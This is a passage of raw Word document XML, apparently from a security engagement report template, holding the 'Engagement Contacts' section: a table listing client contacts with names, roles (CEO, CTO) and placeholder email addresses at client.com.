          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc178498951"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement </w:t>
      </w:r>
      <w:r w:rsidRPr="00587442">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Contacts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="35CC32D6" w14:textId="557F147E" w:rsidR="007E49B6" w:rsidRPr="007E49B6" w:rsidRDefault="007E49B6" w:rsidP="007E49B6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client Contacts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable5Dark-Accent1"/>
        <w:tblW w:w="7735" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2539"/>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="2869"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E49B6" w14:paraId="5B7003FD" w14:textId="77777777">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539" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="415FC306" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Name </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="11C99A52" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>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br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Role </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2870" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
          </w:tcPr>
          <w:p w14:paraId="7E31E6CB" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>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br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E49B6" w14:paraId="48815C1A" w14:textId="77777777">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1421"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2539" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="2206" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2206"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00754200" w14:paraId="407380E3" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="996"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7355DFB1" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00754200" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00754200">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Rachel Williams</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2A245A69" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00754200" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>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49B6" w:rsidRPr="00754200" w14:paraId="41E6ABCD" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4FAD2EBB" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00754200" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4959B894" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1708" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1931"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00714D02" w14:paraId="4886F415" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1446"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="120AEF31" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00714D02" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00714D02">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Chief Executive Officer</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7C4E95D4" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00714D02" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>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49B6" w:rsidRPr="00714D02" w14:paraId="66BB35FD" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="6DD6DBCD" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00714D02" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3713281E" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2870" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00524D85" w14:paraId="3B584404" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="74F6CE61" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:br/>
                    <w:t>rachel@client.com</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="44363322" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00524D85" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>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49B6" w:rsidRPr="00524D85" w14:paraId="36C6207C" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="6E54657B" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00524D85" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="69D9182D" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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7E49B6" w14:paraId="600D566C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1331"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2539" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="2323" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2323"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="0054504D" w14:paraId="7D1BB72C" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1526"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="25B71E8C" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:br/>
                    <w:t>William Ley</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2B4F1CC7" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="0054504D" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>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49B6" w:rsidRPr="0054504D" w14:paraId="1C1CDF70" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="150FD9A2" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="0054504D" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1AB49F63" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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1"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="00071C21" w14:paraId="7C0A43D5" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="270"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="1E534852" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00071C21">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Chief Technical Officer</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="30D93E9C" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>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49B6" w:rsidRPr="00071C21" w14:paraId="582EA866" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="1943C6CF" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="10FF298C" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2869" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="27E9A731" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>wley@client.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49BFD9A4" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pP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7E49B6" w14:paraId="6178E380" w14:textId="77777777">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1331"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2539" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="2323" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2323"/>
            </w:tblGrid>
            <w:tr w:rsidR="007E49B6" w:rsidRPr="0054504D" w14:paraId="328C22B2" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1526"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7AB95202" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:br/>
                    <w:t xml:space="preserve">Mary </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00587442">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>stodz</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="451BC5D4" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="0054504D" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>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49B6" w:rsidRPr="0054504D" w14:paraId="58CACE15" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="55813493" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="0054504D" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:spacing w:line="720" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
